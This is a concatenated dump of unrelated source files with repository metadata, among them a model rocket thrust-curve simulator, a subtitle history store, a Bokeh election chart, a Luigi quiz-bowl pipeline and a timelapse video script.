plt.rc('axes', grid=True)
plt.rc('grid', color='0.75', linestyle='-', linewidth=0.5)
plt.plot(x, [row['adj_close'] for row in y], color='blue', label=s)
plt.plot(x, sma200[-len(x):], color='red', label='SMA(200)')
plt.plot(x, sma20[-len(x):], color='green', label='SMA(20)')
plt.legend()
plt.show()
|
[
"indiejoseph@gmail.com"
] |
indiejoseph@gmail.com
|
13062f5bb63f7c2e896539dfbf77370ec2204220
|
7b7eedc2144883bb88c8445bc684bb72fcc2e866
|
/motors.py
|
56c771dc148821cb556b63e0056f1ed4965e42e8
|
[] |
no_license
|
ZegesMenden/sim-v2
|
b094ecdebcf29f1be39d5b8715a629f57d41cade
|
c250dbc57f98e57b41c473155e4d4699403b8dd8
|
refs/heads/main
| 2023-08-25T04:36:59.441408
| 2021-09-29T03:00:25
| 2021-09-29T03:00:25
| 410,317,421
| 2
| 0
| null | 2021-09-30T20:13:54
| 2021-09-25T16:04:56
|
Python
|
UTF-8
|
Python
| false
| false
| 8,296
|
py
|
import random
d12_thrust = [
[0.049, 2.569],
[0.116, 9.369],
[0.184, 17.275],
[0.237, 24.258],
[0.282, 29.73],
[0.297, 27.01],
[0.311, 22.589],
[0.322, 17.99],
[0.348, 14.126],
[0.386, 12.099],
[0.442, 10.808],
[0.546, 9.876],
[0.718, 9.306],
[0.879, 9.105],
[1.066, 8.901],
[1.257, 8.698],
[1.436, 8.31],
[1.59, 8.294],
[1.612, 4.613],
[1.65, 0]
]
e6_thrust = [
[0.056, 18.59],
[0.112, 20.12],
[0.168, 17.575],
[0.307, 14.38],
[0.531, 10.45],
[0.894, 7.696],
[1.146, 6.244],
[1.691, 5.808],
[2.836, 5.663],
[3.898, 5.517],
[4.275, 5.227],
[4.415, 4.937],
[5.058, 5.082],
[5.519, 5.227],
[5.603, 6.679],
[5.729, 3.921],
[5.882, 2.323],
[5.966, 1.016],
[6.06, 0]
]
e6_rct_thrust = [
[0,0],
[0.047,10.866],
[0.127,11.693],
[0.19,11.9],
[0.316,11.622],
[0.522,10.593],
[0.743,9.287],
[0.996,7.842],
[1.249,6.19],
[1.47,5.296],
[1.787,4.747],
[2.372,4.471],
[3.02,4.403],
[3.747,4.264],
[4.49,4.403],
[5.375,4.333],
[6.087,4.264],
[6.719,4.264],
[6.877,4.196],
[6.957,3.783],
[7.004,2.614],
[7.036,1.513],
[7.083,0.55],
[7.12,0]
]
e12_thrust = [
[0.052, 5.045],
[0.096, 9.910],
[0.196, 24.144],
[0.251, 31.351],
[0.287, 32.973],
[0.300, 29.910],
[0.344, 17.117],
[0.370, 14.414],
[0.400, 12.973],
[0.500, 11.712],
[0.600, 11.171],
[0.700, 10.631],
[0.800, 10.09],
[0.900, 9.73],
[1.000, 9.55],
[1.101, 9.91],
[1.200, 9.55],
[1.300, 9.73],
[1.400, 9.73],
[1.500, 9.73],
[1.600, 9.73],
[1.700, 9.55],
[1.800, 9.73],
[1.900, 9.73],
[2.000, 9.55],
[2.100, 9.55],
[2.200, 9.73],
[2.300, 9.19],
[2.375, 9.37],
[2.400, 5.95],
[2.440, 0.0]
]
f15_thrust = [
[0.063, 2.127],
[0.118, 4.407],
[0.158, 8.359],
[0.228, 13.68],
[0.340, 20.82],
[0.386, 26.75],
[0.425, 25.38],
[0.481, 22.19],
[0.583, 17.93],
[0.883, 16.11],
[1.191, 14.59],
[1.364, 15.35],
[1.569, 15.65],
[1.727, 14.74],
[2.00, 14.28],
[2.39, 13.68],
[2.68, 13.08],
[2.96, 13.07],
[3.25, 13.05],
[3.35, 13.0],
[3.39, 7.30],
[3.40, 0.00]
]
f10_thrust = [
[0.015, 28.22],
[0.077, 26.082],
[0.201, 24.934],
[0.31 ,22.806],
[0.464, 20.183],
[0.573, 17.886],
[0.789, 16.075],
[1.068, 13.946],
[1.393, 12.63],
[1.718, 11.155],
[2.166, 9.844],
[2.677, 9.515],
[3.311, 9.187],
[3.683, 8.859],
[3.791, 9.679],
[4.101, 9.679],
[4.658, 9.515],
[5.168, 9.023],
[5.725, 9.023],
[6.112, 8.531],
[6.329, 8.859],
[6.499, 7.546],
[6.685, 5.742],
[6.778, 4.921],
[6.917, 2.625],
[7.025, 1.312],
[7.13, 0]
]
g12_RCT_thrust = [
[0.03, 18.549],
[0.117, 19.96],
[0.239, 20.64],
[0.362, 20.111],
[0.519, 18.982],
[0.694, 17.138],
[0.886, 15.02],
[1.131, 13.186],
[1.375, 11.915],
[1.689, 11.069],
[2.021, 10.363],
[2.422, 10.232],
[3.172, 9.677],
[4.114, 9.267],
[5.039, 8.857],
[6.137, 8.733],
[7.132, 8.607],
[7.795, 8.335],
[7.952, 8.196],
[8.074, 8.055],
[8.179, 6.924],
[8.319, 4.661],
[8.476, 1.973],
[8.55, 0]
]
g12st_thrust = [
[0.042, 33.827],
[0.104, 30.173],
[0.23, 28.009],
[0.543, 22.326],
[0.836, 16.102],
[1.024, 12.448],
[1.379, 10.96],
[2.006, 10.148],
[4.054, 9.742],
[6.269, 10.148],
[6.415, 10.148],
[6.582, 10.148],
[11.973, 9.742],
[12.475, 9.742],
[12.663, 9.607],
[12.83, 9.066],
[12.913, 7.713],
[12.934, 5.412],
[13.018, 2.03],
[13.06, 0.0]
]
g11_thrust = [
[0.084, 30.444],
[0.105, 28.414],
[0.209, 27.738],
[0.419, 24.085],
[0.753, 18.402],
[0.9, 14.748],
[1.046, 11.907],
[1.444, 10.013],
[2.051, 9.742],
[3.034, 9.201],
[4.018, 9.471],
[5.483, 9.201],
[5.713, 8.93],
[9.375, 9.742],
[9.501, 8.93],
[11.049, 9.742],
[12.263, 9.336],
[13.288, 8.66],
[13.456, 7.307],
[13.602, 4.6],
[13.77, 1.624],
[13.937, 0.0]
]
g8st_thrust = [
[0.038, 5.121],
[0.039, 8.069],
[0.188, 9.828],
[0.414, 10.397],
[0.715, 10.19],
[1.354, 9.517],
[2.069, 9.155],
[3.424, 8.793],
[4.552, 8.431],
[6.057, 8.276],
[6.81, 8.069],
[7.713, 8.121],
[9.03, 8.017],
[9.97, 7.966],
[10.76, 7.914],
[14.222, 7.397],
[14.335, 7.19],
[15.764, 7.138],
[16.404, 6.983],
[16.554, 7.5],
[16.63 ,6.724],
[16.818, 5.69],
[16.968, 3.414],
[17.119, 1.655],
[17.269, 0.0]
]
h13st_thrust = [
[0.005, 0.107],
[0.024, 2.636],
[0.035, 18.978],
[0.081, 32.724],
[0.147, 36.421],
[0.379, 44.529],
[0.452, 23.851],
[0.566, 18.890],
[0.818, 16.728],
[1.286, 15.676],
[2.114, 14.753],
[3.230, 14.032],
[4.382, 13.926],
[5.786, 13.469],
[7.082, 13.119],
[8.666, 12.916],
[10.286, 12.820],
[12.086, 12.612],
[13.598, 12.333],
[14.750, 11.908],
[15.230, 11.078],
[15.302, 6.048],
[15.432, 0]
]
#making a better thrust curve by averaging the thrust curve data
def interpolateThrust(thrust_curve, timeStep):
# print(thrust_curve)
thrustList = []
lPoint = [0,0]
for point in thrust_curve:
if point[0] > 0:
thrustDiff = point[1] - lPoint[1]
timeDiff = point[0] - lPoint[0]
stepsNeeded = timeDiff * timeStep
if stepsNeeded > 0:
adder = thrustDiff / stepsNeeded
i = 0
thrustToAdd = lPoint[1]
while i < stepsNeeded:
i += 1
thrustToAdd += adder
thrustList.append(thrustToAdd)
lPoint = point
# print(thrustList)
return thrustList
class motorType(enumerate):
d12 = d12_thrust
e6 = e6_thrust
e6_rct = e6_rct_thrust
e12 = e12_thrust
f15 = f15_thrust
f10 = f10_thrust
g12_rct = g12_RCT_thrust
g12_st = g12st_thrust
g11 = g11_thrust
g8_st = g8st_thrust
h13 = h13st_thrust
class rocketMotor:
def __init__(self, timeStep):
self.motorNames = []
self.thrustLists = {}
self.currentThrust = 0.0
self.ignitionTimes = {}
self.ignitionDelays = {}
self.timeStep = timeStep
self.maxIgnitionDelay = 0.0
self.totalMotorMass = 0.0
self.lastTime = 0.0
self.isLit = {}
self.isEjected = {}
def add_motor(self, motor, motorName):
self.totalMotorMass += 0.04
self.motorNames.append(str(motorName))
self.thrustLists[str(motorName)] = interpolateThrust(motor, self.timeStep)
self.ignitionDelays[str(motorName)] = random.randint(90, 100) / 100 * self.maxIgnitionDelay
self.ignitionTimes[str(motorName)] = 0.0
self.isLit[str(motorName)] = False
self.isEjected[str(motorName)] = False
def ignite(self, motor, time):
if self.isLit[str(motor)] == False:
if motor == "ascent":
self.ignitionTimes[str(motor)] = time * self.timeStep
else:
self.ignitionTimes[str(motor)] = (time + self.ignitionDelays[str(motor)]) * self.timeStep
self.isLit[str(motor)] = True
def update(self, time):
dt = time - self.lastTime
for motor in self.motorNames:
if self.isLit[motor] == True:
counter = int((time * self.timeStep) - self.ignitionTimes[motor])
if counter > 0 and counter < len(self.thrustLists[motor]):
self.currentThrust = self.thrustLists[motor][counter]
self.totalMotorMass -= 0.008 * dt
elif counter > len(self.thrustLists[motor]):
self.currentThrust = 0.0
if self.isEjected[motor] == False:
self.totalMotorMass -= 0.02
self.isEjected[motor] = True
self.lastTime = time
|
[
"camkullberg@gmail.com"
] |
camkullberg@gmail.com
|
535ab1f03fa288dffff618b0626cc5aadff6aeb8
|
8a820aa0d3b0d69d8073780e2bf1db7b6bfdd9ef
|
/Contents/Libraries/Shared/subzero/history_storage.py
|
4a20e8b2a72df7694d5e013371705d5ea971e1c2
|
[
"MIT"
] |
permissive
|
doopler/Sub-Zero.bundle
|
27c3fb6e7e953381a2a19fec81a88efe4f1e0e70
|
82550a7341fcd40ef97af4b1ba0f3ed2b5063121
|
refs/heads/master
| 2020-03-26T08:40:56.903484
| 2018-08-14T12:17:59
| 2018-08-14T12:17:59
| 144,715,110
| 1
| 0
| null | 2018-08-14T12:09:26
| 2018-08-14T12:09:25
| null |
UTF-8
|
Python
| false
| false
| 3,373
|
py
|
# coding=utf-8
import datetime
import logging
import traceback
import types
from subzero.language import Language
from constants import mode_map
logger = logging.getLogger(__name__)
class SubtitleHistoryItem(object):
item_title = None
section_title = None
rating_key = None
provider_name = None
lang_name = None
lang_data = None
score = None
time = None
mode = "a"
def __init__(self, item_title, rating_key, section_title=None, subtitle=None, mode="a", time=None):
self.item_title = item_title
self.section_title = section_title
self.rating_key = str(rating_key)
self.provider_name = subtitle.provider_name
self.lang_name = str(subtitle.language.name)
self.lang_data = str(subtitle.language.alpha3), \
str(subtitle.language.country) if subtitle.language.country else None, \
str(subtitle.language.script) if subtitle.language.script else None
self.score = subtitle.score
self.time = time or datetime.datetime.now()
self.mode = mode
@property
def title(self):
return u"%s: %s" % (self.section_title, self.item_title)
@property
def language(self):
if self.lang_data:
lang_data = [s if s != "None" else None for s in self.lang_data]
if lang_data[0]:
return Language(lang_data[0], country=lang_data[1], script=lang_data[2])
@property
def mode_verbose(self):
return mode_map.get(self.mode, "Unknown")
def __repr__(self):
return unicode(self)
def __unicode__(self):
return u"%s (Score: %s)" % (unicode(self.item_title), self.score)
def __str__(self):
return str(self.rating_key)
def __hash__(self):
return hash((self.rating_key, self.score))
def __eq__(self, other):
return (self.rating_key, self.score) == (other.rating_key, other.score)
def __ne__(self, other):
# Not strictly necessary, but to avoid having both x==y and x!=y
# True at the same time
return not (self == other)
class SubtitleHistory(object):
size = 100
storage = None
threadkit = None
def __init__(self, storage, threadkit, size=100):
self.size = size
self.storage = storage
self.threadkit = threadkit
def add(self, item_title, rating_key, section_title=None, subtitle=None, mode="a", time=None):
with self.threadkit.Lock(key="sub_history_add"):
items = self.items
item = SubtitleHistoryItem(item_title, rating_key, section_title=section_title, subtitle=subtitle, mode=mode, time=time)
# insert item
items.insert(0, item)
# clamp item amount
items = items[:self.size]
# store items
self.storage.SaveObject("subtitle_history", items)
@property
def items(self):
try:
items = self.storage.LoadObject("subtitle_history") or []
except:
items = []
logger.error("Failed to load history storage: %s" % traceback.format_exc())
if not isinstance(items, types.ListType):
items = []
else:
items = items[:]
return items
def destroy(self):
self.storage = None
self.threadkit = None
|
[
"panni@fragstore.net"
] |
panni@fragstore.net
|
780173b271325b9397af4297e081e6d0729e5fa6
|
0951232bebefae4f22fb3692faedf3fbace12924
|
/Lambda.py
|
b1b8dc85df0a8e0441b4c0b9de6828b83bba40d8
|
[] |
no_license
|
AshishXD/PyPrograms
|
340ad65edb608113552656b7492b30109f69905e
|
f7f58a438466ff4b95aa54dfd7a752627e6441bd
|
refs/heads/master
| 2020-05-17T16:47:31.680867
| 2019-05-02T00:14:18
| 2019-05-02T00:14:18
| 183,571,138
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
f = lambda a, b: a*b
result = f(5, 6)
print(result)
|
[
"28337472+AshishXD@users.noreply.github.com"
] |
28337472+AshishXD@users.noreply.github.com
|
a1425ba1a47bf48e828aaf70912eeb18a857a0d7
|
3ccc4d7e778e1505a861233454400322a537772e
|
/python-1/loops/iterables.py
|
4056446e25bf4627dd7360b7fd8ca0b4d3634864
|
[] |
no_license
|
abubakr2234/Python-1
|
90687231a96050980fb51fb1520bce73786db232
|
6e065f1dfec2be79394b9d04322569d7daa25918
|
refs/heads/main
| 2023-01-20T21:57:36.763085
| 2020-11-30T07:52:32
| 2020-11-30T07:52:32
| 317,148,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 45
|
py
|
for item in shopping_cart:
print(item)
|
[
"noreply@github.com"
] |
abubakr2234.noreply@github.com
|
c7268b076f3a3fcd57055a0189fabb5f00b8addb
|
39a624acb3598e311e3eeec674c883c013a14db7
|
/src/vis_rq2.1.py
|
237c1703a62c64f027978b98c0e97fd194c9bd91
|
[] |
no_license
|
prasri92/MaxEnt
|
69c9f5456c0fbd8feb3a702b76e5f0df0f7e8c0c
|
9c37c1d12ac6a475a763b3655dd9af1f201c2728
|
refs/heads/master
| 2020-05-04T19:20:24.066256
| 2020-04-14T15:34:15
| 2020-04-14T15:34:15
| 179,388,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,682
|
py
|
'''
Python = 3.7
matplotlib to plot figures
'''
#PYTHON3
import numpy as np
import pickle
import matplotlib.pyplot as plt
import csv
import pandas as pd
import sys
from scipy.stats import power_divergence
from scipy.spatial import distance
np.seterr(all='raise')
perturb_prob = [0.01, 0.03, 0.06, 0.09, 0.12, 0.15, 0.18, 0.21]
# perturb_prob = [0.01, 0.03, 0.06, 0.09, 0.12, 0.15]
# Read the true prob. distribution for sum of diseases
def read_up_prob(filename):
with open(filename, "rb") as outfile:
prob = pickle.load(outfile,encoding='latin1')
return prob[0], prob[1]
def read_p_prob(filename):
with open(filename, "rb") as outfile:
prob = pickle.load(outfile,encoding='latin1')
return prob[0], prob[1]
# Get kl divergence of probability distributions
def kl_divergence(p, q):
return (p*np.log(p/q)).sum()
def calc_kl(k, i=3):
kl_ur_p = []
kl_r_p = []
maxent_ur_up, maxent_r_up = read_up_prob('../output/d'+str(k)+'_expt2.1_w1_ls/syn_maxent_up'+str(i)+'.pickle')
for p in perturb_prob:
maxent_file = '../output/d'+str(k)+'_expt2.1_w1_ls/syn_maxent_p'+str(i)+'_'+str(p)+'.pickle'
maxent_ur_p, maxent_r_p = read_p_prob(maxent_file)
p = np.array(maxent_ur_up)
q = np.array(maxent_ur_p)
r = np.array(maxent_r_up)
s = np.array(maxent_r_p)
try:
kl_1, p_val_1 = power_divergence(f_obs=q, f_exp=p, lambda_="cressie-read")
kl_2, p_val_2 = power_divergence(f_obs=s, f_exp=r, lambda_="cressie-read")
# kl_1 = distance.jensenshannon(p, q)
# kl_2 = distance.jensenshannon(r, s)
# kl_1 = kl_divergence(p, q)
# kl_2 = kl_divergence(r, s)
except:
p[p == 0] = 1e-300
r[r == 0] = 1e-300
kl_1, p_val_1 = power_divergence(f_obs=q, f_exp=p, lambda_="cressie-read")
kl_2, p_val_2 = power_divergence(f_obs=s, f_exp=r, lambda_="cressie-read")
# print('P:', p)
# print('Q:', q)
# print('R:', r)
# print('S:', s)
kl_ur_p.append(kl_1)
kl_r_p.append(kl_2)
return kl_ur_p, kl_r_p
def plot(k):
# x_ticks = np.arange(0, 0.23, 0.02)
# y_ticks = np.arange(0, 3, 0.5)
plt.style.use('seaborn-darkgrid')
kl_ur_p, kl_r_p = calc_kl(k=k)
plt.plot(perturb_prob, kl_ur_p, marker='o', label='Unregularized')
plt.plot(perturb_prob, kl_r_p, marker='d', label='Regularized')
# plt.xticks(x_ticks)
# plt.yticks(y_ticks)
plt.legend(fontsize=9)
plt.title('Regularization for different Perturbations: '+str(k)+' diseases (Learned Support)\n'+'Single Width W = 1')
plt.xlabel('Perturbed Probability')
plt.ylabel(r'Power Divergence ($\lambda$ = 2/3)')
# plt.ylabel('Jensen-Shannon Divergence')
plt.savefig('../figures/Experiments/pert_d'+str(k)+'_robust_ls.png')
plt.show()
num_dis = sys.argv[1]
plot(int(num_dis))
|
[
"pboddavarama@umass.edu"
] |
pboddavarama@umass.edu
|
e13de2855dbb68e6195e0ee8c48fadd3b73e75f5
|
136ba112f67b7459891d50fb8eb33e5aca99b8ef
|
/cv4/cv4/cv4.py
|
7c762a58ee55d1c6fbd2fd094baeef2ad9e31e7b
|
[] |
no_license
|
hruskaz/python
|
1bdf940fb890742e4ad03b5e3e2a953aa7d68401
|
98605087aceffa3120d8f9b55d534715241a114a
|
refs/heads/master
| 2021-05-09T10:38:28.314177
| 2018-01-25T21:02:53
| 2018-01-25T21:02:53
| 118,968,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,209
|
py
|
import json
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid
from bokeh.models.glyphs import Wedge
from bokeh.plotting import figure, show
from numpy import pi
import numpy
from bokeh.io import curdoc, show
parties=[]
json = json.loads(open('election.json', encoding='utf-8').read())
lowParties = {'name': 'Other',
'share': 0,
'number': 0,
'votes': 0,
'color': '#d1f442',
'short': 'Other'}
parties.append(lowParties)
for item in json:
party = {}
if item['share'] < 1:
parties[0]['share']+=item['share']
parties[0]['votes']+=item['votes']
else:
party['name']=item['name']
party['share']=item['share']
party['number']=item['number']
party['votes']=item['votes']
if 'color' in item.keys():
party['color']=item['color']
else:
party['color']="#b3de69"
if 'short' in item.keys():
party['short']=item['short']
else:
party['short']=item['name']
parties.append(party)
party=dict()
datasource = ColumnDataSource(dict(
names = [party['name'] for party in parties],
shares=[party['share'] for party in parties],
numbers=[party['number'] for party in parties],
votes=[party['votes'] for party in parties],
colors=[party['color'] for party in parties],
shorts=[party['short'] for party in parties],
length=range(len(parties)),
width=[0.7 for x in range(len(parties)) ]
))
begins = []
ends=[]
wbr=[float("{0:.2f}".format((party['share']*3.6)*pi/180)) for party in parties]
cursor=0
for i in range(0,len(wbr)):
begins.append(cursor+wbr[i])
cursor+=wbr[i]
for item in begins:
if begins.index(item)==0:
continue;
else:
ends.append(item)
ends.append(begins[0])
wgs=ColumnDataSource(data={
'starts': begins,
'ends': ends,
'color': [party['color'] for party in parties],
'label': [party['short'] for party in parties]
})
chart = figure()
chart.vbar( x = 'length', top = 'votes', width = 'width', fill_color='colors', legend='shorts', source=datasource)
show(chart)
chart = figure()
chart.wedge(x=0,y=0,radius=1,start_angle='starts',end_angle='ends',color='color',legend='label',source=wgs)
show(chart)
|
[
"35738612+hruskaz@users.noreply.github.com"
] |
35738612+hruskaz@users.noreply.github.com
|
89179fd9b5645eb46626433f7b906e7327866d51
|
fb124f5ebf77612763cba74b4cc74a8b0c6ad529
|
/mir/mir/pipelines.py
|
ed6286dbd0c641f260c9d58c395752612e6c1a9a
|
[] |
no_license
|
mhbahmani/Microsoft-Academic-Crawling
|
e3b5a55bf387aa7fd89328a4dd7ce482ec3246a9
|
eadbe5c13969f6b2d620472edeee8be73360d66e
|
refs/heads/master
| 2023-06-15T04:35:02.578425
| 2021-07-12T11:34:09
| 2021-07-12T11:34:09
| 376,807,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class MirPipeline:
def process_item(self, item, spider):
return item
|
[
"mhbahmani79@gmail.com"
] |
mhbahmani79@gmail.com
|
75cd87ee0375251effc90d2312b9755e3c5f3ff0
|
546168fc714d5de62c78eb49fa05a6c079c5dcca
|
/main.py
|
370da353ffb92d5ccdf10358af94b23d6621faba
|
[] |
no_license
|
Introduction-to-Programming-OSOWSKI/2-8-hasl-BrandonFreeman24
|
7b360b0c7452b309e9fe3296eb5cfd2aa6397ad1
|
6c77d77b0fb0759f90e32e7435a08e6d85064eeb
|
refs/heads/master
| 2023-08-15T02:48:35.564465
| 2021-10-06T19:40:08
| 2021-10-06T19:40:08
| 413,567,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
def hasL(w):
for i in range(0, len(w)):
if w[i] == "l":
return True
return False
print(hasL("sup"))
|
[
"818119@mystma.org"
] |
818119@mystma.org
|
5ced23b07ed976ff1e9dcab53779bde7a769629e
|
dc234aa3d956a43ef3c269a80e15ee79350d05fd
|
/interface/driver/driver_get.py
|
a1aca852bce7a5cf36d8b3f8cd3fc852094aa6f5
|
[] |
no_license
|
penny1205/UI_testing_compare
|
06eee20ebde751a9907c48608143ce09f52bdadd
|
09e3fd4d2d8f41599118ea3262b68d43a0159fac
|
refs/heads/master
| 2020-06-18T15:00:53.664013
| 2018-02-01T06:58:33
| 2018-02-01T06:58:33
| 196,339,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
#__author__ = 'pan'
# -*- coding:utf-8 -*-
from util.http.httpclient import HttpClient
from util.config.yaml.readyaml import ReadYaml
from util.file.fileutil import FileUtil
from util.log.log import Log
class DriverGet(object):
'''
根据外请车车主loginId查司机信息
/api/tms/driver/getTmsAppDriverDetail
'''
__slots__ = ('__driverGetApiUrl', '__head_dict')
def __init__(self):
config = ReadYaml(FileUtil.getProjectObsPath() + '/config/config.yaml').getValue()
self.__driverGetApiUrl = "https://{0}:{1}{2}/api/tms/driver/getTmsAppDriverDetail".format(
config['tms_api_host'],config['tms_api_port'],config['tms_api_path'])
self.__head_dict = {
'token': config['tms_api_token'],
'YD_OAUTH': config['tms_api_YD_OAUTH'],
}
def driver_get(self,loginId=''):
'''根据外请车车主loginId查司机信息'''
try:
payload = {
'loginId': loginId
}
response = HttpClient().get(self.__driverGetApiUrl,self.__head_dict,payload)
return response
except Exception as e:
Log().error('根据外请车车主loginId查司机信息发生异常:{0}'.format(e))
return None
|
[
"panyuanyuan@keking.cn"
] |
panyuanyuan@keking.cn
|
69dd8b29c317d19d14daa7afd3d77d7da537cda0
|
6214c5175247107cbdd5b79f89585566c06f2081
|
/qanta/expo/pipeline.py
|
c17d494af85825359c52360392bcf96e870cc0e7
|
[
"MIT"
] |
permissive
|
IFarhankhan/qb
|
aedd4c2b6cb3413c6133ac4cc370516c5b9302d2
|
72ce2016e2ed68c7b999d0523b456b0dd1456c8f
|
refs/heads/master
| 2021-06-15T20:19:01.338830
| 2017-04-13T01:32:53
| 2017-04-13T01:32:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,532
|
py
|
import csv
import luigi
from luigi import LocalTarget, Task, ExternalTask, WrapperTask
from qanta.reporting.performance import load_data, load_audit
from qanta.datasets.quiz_bowl import QuestionDatabase
from qanta.preprocess import format_guess
from qanta.util.io import safe_path
from qanta.util.environment import QB_QUESTION_DB
from qanta.util.constants import (PRED_TARGET, META_TARGET, EXPO_BUZZ, EXPO_FINAL, VW_AUDIT,
EXPO_QUESTIONS)
def find_final(lines):
for l in lines:
if l.buzz:
return l.sentence, l.token, l.guess
return -1, -1, lines[-1].guess
class CreateTestQuestions(Task):
def output(self):
return LocalTarget(safe_path(EXPO_QUESTIONS))
def run(self):
db = QuestionDatabase(QB_QUESTION_DB)
questions = db.all_questions()
with open(safe_path(EXPO_QUESTIONS), 'w', newline='') as f:
f.write('id,answer,sent,text\n')
writer = csv.writer(f, delimiter=',')
for q in questions.values():
if q.fold != 'test':
continue
max_sent = max(q.text.keys())
for i in range(max_sent + 1):
writer.writerow([q.qnum, format_guess(q.page), i, q.text[i]])
class Prerequisites(ExternalTask):
fold = luigi.Parameter()
def output(self):
return [LocalTarget(PRED_TARGET.format(self.fold)),
LocalTarget(META_TARGET.format(self.fold))]
class GenerateExpo(Task):
fold = luigi.Parameter()
def requires(self):
yield Prerequisites(fold=self.fold)
def output(self):
return [LocalTarget(EXPO_BUZZ.format(self.fold)),
LocalTarget(EXPO_FINAL.format(self.fold))]
def run(self):
db = QuestionDatabase(QB_QUESTION_DB)
data = load_data(PRED_TARGET.format(self.fold),
META_TARGET.format(self.fold), db)
audit_data = load_audit(VW_AUDIT.format(self.fold), META_TARGET.format(self.fold))
buzz_file = open(safe_path(EXPO_BUZZ.format(self.fold)), 'w', newline='')
buzz_file.write('question,sentence,word,page,evidence,final,weight\n')
buzz_writer = csv.writer(buzz_file, delimiter=',')
final_file = open(safe_path(EXPO_FINAL.format(self.fold)), 'w', newline='')
final_file.write('question,answer\n')
final_writer = csv.writer(final_file, delimiter=',')
for qnum, lines in data:
final_sentence, final_token, final_guess = find_final(lines)
if final_sentence == -1 and final_token == -1:
final_writer.writerow([qnum, final_guess])
for l in lines:
i = 0
is_final = False
if l.sentence == final_sentence and l.token == final_token:
final_writer.writerow([qnum, l.guess])
is_final = True
for g in l.all_guesses:
evidence = audit_data[(l.question, l.sentence, l.token, g.guess)]
buzz_writer.writerow([
l.question, l.sentence, l.token, g.guess, evidence,
int(is_final and g.guess == l.guess), g.score
])
i += 1
if i > 4:
break
buzz_file.close()
final_file.close()
class AllExpo(WrapperTask):
def requires(self):
yield GenerateExpo(fold='test')
yield CreateTestQuestions()
|
[
"ski.rodriguez@gmail.com"
] |
ski.rodriguez@gmail.com
|
cda5c04bfa981680632afe5e9defebb88adf8ca5
|
4ff54f6cd44e7b2beba39e74dad589083687b93b
|
/blogproject parts7/blog/migrations/0008_post_uploaded_at.py
|
b255a5bfac9636c5318209564caef206c0e325e6
|
[] |
no_license
|
jaganmohangg/kokokoko
|
200a2d1bc5726f0777407c8f527eec930013160b
|
70d5c91417911069da8cc8d42f26b62a1656aba9
|
refs/heads/master
| 2020-06-02T02:24:21.105744
| 2019-06-09T12:46:10
| 2019-06-09T12:46:10
| 191,005,165
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 550
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-06-08 05:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_post_document'),
]
operations = [
migrations.AddField(
model_name='post',
name='uploaded_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
]
|
[
"gavvala.jagan@gmail.com"
] |
gavvala.jagan@gmail.com
|
f74baf4cce632b72f3475d46364caf95e9ed4cca
|
bf1b398b2318a1db7654eb2fc923ccaf63b6ce87
|
/create_video.py
|
a7363caf3155f5e2ed021da96171aafdb1ee9228
|
[] |
no_license
|
Maddix/Pylapse
|
9c119a384a87c3da5b6d8dde63281e65d275cf08
|
d1a2819333a447b4f642f2b4b8529f8b0b2130f1
|
refs/heads/master
| 2021-01-10T17:00:45.038549
| 2015-10-24T22:46:28
| 2015-10-24T22:46:28
| 44,137,581
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,902
|
py
|
#! usr/bin/python3
# Maddix - Oct 2015 - Python 3.4
# NOTE: Not tested. Remove when it is.
"""
The MIT License (MIT)
Copyright (c) 2015 Maddix
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import src.utils as utils
# TODO: Logging
def pick(folders):
print("Pick a folder or enter 'quit' to quit. Enter a positive number.")
count = 0
for folder in folders:
count += 1
print("[{0}] {1}".format(count, folder))
while True:
picked = input(">> ")
if picked == "quit" or picked == "'quit'":
raise Exception("Bye!")
if picked.isnumeric():
if int(picked)-1 in range(len(folders)):
return folders[int(picked)-1]
else:
print("Please pick a number form 1 to {0}.".format(len(folders)))
else:
print("Positive numbers only.")
if __name__ == "__main__":
print("Loading Config.json..")
config = utils.Handle_json("config.json", "src", [("ffmpeg-command", list)])
print("Done.\nLocating ffmpeg.exe..")
if not utils.check_for_ffmpeg(config):
raise Exception("Could not find ffmpeg.exe!")
print("Done.\nLoading video folder..")
config.check_required([
("folder-options", dict),
("folder-options.source", list),
("folder-options.destination", list),
("folder-options.image-folder-name", str),
("folder-options.video-folder-name", str),
("options", dict),
("options.image-number-total-pad", int),
("options.image-type", str),
("ffmpeg-command", list)
])
destination = os.path.join(*config.get("folder-options.destination"))
